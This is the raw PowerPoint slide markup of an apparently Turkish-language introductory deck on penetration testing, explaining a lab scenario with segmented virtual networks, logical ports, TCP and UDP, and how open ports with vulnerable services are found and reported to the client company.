              <a:rPr lang="tr-TR" sz="4100" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP ve UDP Paket Göndermekteki Amacımız Ne ?</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DFE61E"/>
          </a:solidFill>
          <a:ln w="38100" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="DFE61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EC9A3D73-C461-C19D-EB5D-FDCC0D38B0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2872899"/>
            <a:ext cx="4953000" cy="3396836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Burada port taraması yapıyoruz. Port derken fiziksel olarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, giriş portunu kastetmiyoruz. Soyut bir kavramdan söz ediyoruz. Mantıksal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bağlanmadan.Her</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinanın haberleşmek için arka planda çalıştırdığı sanal portların var olduğunu bilmeliyiz. Bunlar toplamda 65535 tanedir. Bu portlar içerisindeki protokoller, yazılımlar, internet üzerinden diğer cihazlar ile iletişim kurmak için kullanılırlar. Örnek vermek gerekirse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC5B1CE-DEFE-C00C-C72F-325AD9A5BE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="18572" r="25008"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773775" y="10"/>
            <a:ext cx="641670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17095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9D5E51F-4185-0733-E1C1-C1803A96F5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930" y="2776156"/>
            <a:ext cx="10417651" cy="3818607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A32FC6F7-FE50-53BA-E768-3E7238E1267C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956930" y="467833"/>
            <a:ext cx="10717619" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Proje kapsamında bir kuruma “Sızma testi” uygulanacaktır. Senaryo gereği kurum ağı Vm-0, Vm-1 ve Vm-2 ağlarına bölünmüştür. Vm-1 ağında çalışanlar Linux, Windows makinalarını kullanıldığı düşünülmüş. Ağ bağlantıları modem-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> üzerinden gerçekleştirilmiştir.  Vm-2 ve Vm-3 ağları sanal olarak oluşturmuş ve farklı networklere ayrılmıştır. Vm-2 ağında Server, File Server, E-mail Server ve E-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>commerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Server bulunmaktadır. Vm-3 ağında ise FTP Server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Streamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Server, Web Server bulunmaktadır. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ekibine bağlantı verilmeyerek kurum içi ağlarına sızması istenmiş alınan bağlantı sonrası çalışanlar ağı olan Vm-1 networküne sızma işlemi gerçekleştirmesi istenmiştir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2975417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AEF235-40B9-58DF-8890-1DA7933FA026}"/>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Sızma işlemleri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED33A5A-F242-2A94-9A3F-64CD56FE6020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sızma işlemini gerçekleştirilirken hedef cihaza paketler göndereceğiz ve alacağımız sonuçlar doğrultusunda bir plan belirleyeceğiz. Hepimizin bildiği üzere paketler TCP ve UDP olarak ayırılır. Verilerimizi göndermek için kullandığımız protokollerdir. Kısaca bilgi/keşif için kullandığımız araç/paket diyebiliriz. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1110592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çerik Yer Tutucusu 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8BBBDDB-BC5A-4C1D-CF82-3E63A238FE6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="4973" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180279" y="320457"/>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14" name="Metin kutusu 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DFD562D-1D09-A151-BBEC-C677B4EB9839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5800725" y="3429000"/>
            <a:ext cx="6206636" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Burada kullanıcımız bir Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Server’ine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> HTTP 80 portuna bağlanmış. Yine aynı şekilde SMTP 25 portu ile de mail işlemlerini yapmış. Burada belirttiğimiz 80, 25 bizim sanal portlarımız, HTTP ve SMTP ise bu portlar üzerinde çalışan protokollerimiz. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233145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595ACE3-6D64-1720-7128-463807B012BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Eğer hedef sistemde açık port ve bu açık olan portta çalışan savunmasız bir yazılım, protokol varsa  hedef cihaz savunmasız ve istismar edilebilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bir siber güvenlik uzmanı olarak bizim işimiz sızma testlerinde açık portları taramak ve bu açık portlar üzerindeki savunmasız yazılımları kullanarak sızma işlemini gerçekleştirip, hizmet verdiğimiz şirketi açıklar konusunda bilgilendirmek olacaktır. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336214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B69AF8C-C811-7B70-C665-F4F05ADBD1A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424568" y="539787"/>
            <a:ext cx="10909640" cy="1103276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tcp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Udp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portlarımızın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osi’nin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ulaşım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katmanında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çalıştığını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Tcp’nin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daha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güvenli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  (3’lü </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>el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sıkışma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işlemi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yaptığı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Udp’de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paketlerin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direkt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gönderildiği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hızlı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olduğunu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bilmemiz</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şimdilik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bizim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için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yeterli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olacaktır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C22C52C-8543-E351-DF2F-F39000F46504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214438" y="1956245"/>
            <a:ext cx="9772650" cy="4581715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3750210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753" y="2634908"/>
            <a:ext cx="3772532" cy="27432"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3772532"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX1" fmla="*/ 704206 w 3772532"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX2" fmla="*/ 1370687 w 3772532"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX3" fmla="*/ 2037167 w 3772532"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX4" fmla="*/ 2552747 w 3772532"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX5" fmla="*/ 3106051 w 3772532"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX6" fmla="*/ 3772532 w 3772532"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX7" fmla="*/ 3772532 w 3772532"/>
              <a:gd name="connsiteY7" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX8" fmla="*/ 3143777 w 3772532"/>
              <a:gd name="connsiteY8" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX9" fmla="*/ 2628197 w 3772532"/>
              <a:gd name="connsiteY9" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX10" fmla="*/ 2112618 w 3772532"/>
              <a:gd name="connsiteY10" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX11" fmla="*/ 1446137 w 3772532"/>
              <a:gd name="connsiteY11" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX12" fmla="*/ 892833 w 3772532"/>
              <a:gd name="connsiteY12" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 3772532"/>
              <a:gd name="connsiteY13" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 3772532"/>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72532" h="27432" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="244720" y="-3658"/>
                  <a:pt x="354662" y="-9412"/>
                  <a:pt x="704206" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1053750" y="9412"/>
                  <a:pt x="1098475" y="-322"/>
                  <a:pt x="1370687" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1642899" y="322"/>
                  <a:pt x="1719797" y="-23304"/>
                  <a:pt x="2037167" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2354537" y="23304"/>
                  <a:pt x="2327380" y="-17312"/>
                  <a:pt x="2552747" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2778114" y="17312"/>
                  <a:pt x="2963395" y="16906"/>
                  <a:pt x="3106051" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3248707" y="-16906"/>
                  <a:pt x="3607729" y="-1190"/>
                  <a:pt x="3772532" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3771575" y="8431"/>
                  <a:pt x="3772183" y="14612"/>
                  <a:pt x="3772532" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3590140" y="16334"/>
                  <a:pt x="3310324" y="674"/>
                  <a:pt x="3143777" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2977231" y="54190"/>
                  <a:pt x="2760348" y="26592"/>
                  <a:pt x="2628197" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2496046" y="28272"/>
                  <a:pt x="2363991" y="25547"/>
                  <a:pt x="2112618" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1861245" y="29317"/>
                  <a:pt x="1763019" y="1242"/>
                  <a:pt x="1446137" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1129255" y="53622"/>
                  <a:pt x="1116896" y="2843"/>
                  <a:pt x="892833" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="668770" y="52021"/>
                  <a:pt x="337811" y="-9110"/>
                  <a:pt x="0" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="226" y="18208"/>
                  <a:pt x="-648" y="12891"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="3772532" h="27432" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="136381" y="23473"/>
                  <a:pt x="333157" y="-1611"/>
                  <a:pt x="591030" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="848903" y="1611"/>
                  <a:pt x="874121" y="-21763"/>
                  <a:pt x="1106609" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1339097" y="21763"/>
                  <a:pt x="1575126" y="18505"/>
                  <a:pt x="1810815" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2046504" y="-18505"/>
                  <a:pt x="2110261" y="21722"/>
                  <a:pt x="2401845" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2693429" y="-21722"/>
                  <a:pt x="2769280" y="8922"/>
                  <a:pt x="2992875" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3216470" y="-8922"/>
                  <a:pt x="3395186" y="-17861"/>
                  <a:pt x="3772532" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3771177" y="9524"/>
                  <a:pt x="3771330" y="13975"/>
                  <a:pt x="3772532" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3635941" y="57411"/>
                  <a:pt x="3310352" y="7993"/>
                  <a:pt x="3143777" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2977203" y="46871"/>
                  <a:pt x="2807596" y="3382"/>
                  <a:pt x="2628197" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2448798" y="51482"/>
                  <a:pt x="2302918" y="50688"/>
                  <a:pt x="1999442" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1695966" y="4176"/>
                  <a:pt x="1623081" y="31473"/>
                  <a:pt x="1370687" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1118294" y="23391"/>
                  <a:pt x="932834" y="17695"/>
                  <a:pt x="779657" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="626480" y="37170"/>
                  <a:pt x="206972" y="-11355"/>
                  <a:pt x="0" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-800" y="16780"/>
                  <a:pt x="-583" y="12910"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00D5F3"/>
          </a:solidFill>
          <a:ln w="38100" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="00D5F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Resim 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90B3F3F4-E582-33AF-1C1F-49BC2A84CEA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5614989" y="5241455"/>
            <a:ext cx="5229224" cy="873595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Resim 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72EE0F26-AC99-B71B-4ACB-E143B09895AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4779084" y="0"/>
            <a:ext cx="2489520" cy="3456432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B4956A-5425-C4F6-CEB9-6CBC0ED722FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082111" y="370659"/>
            <a:ext cx="3099816" cy="2715113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6" descr="metin, kişi, iç mekan içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
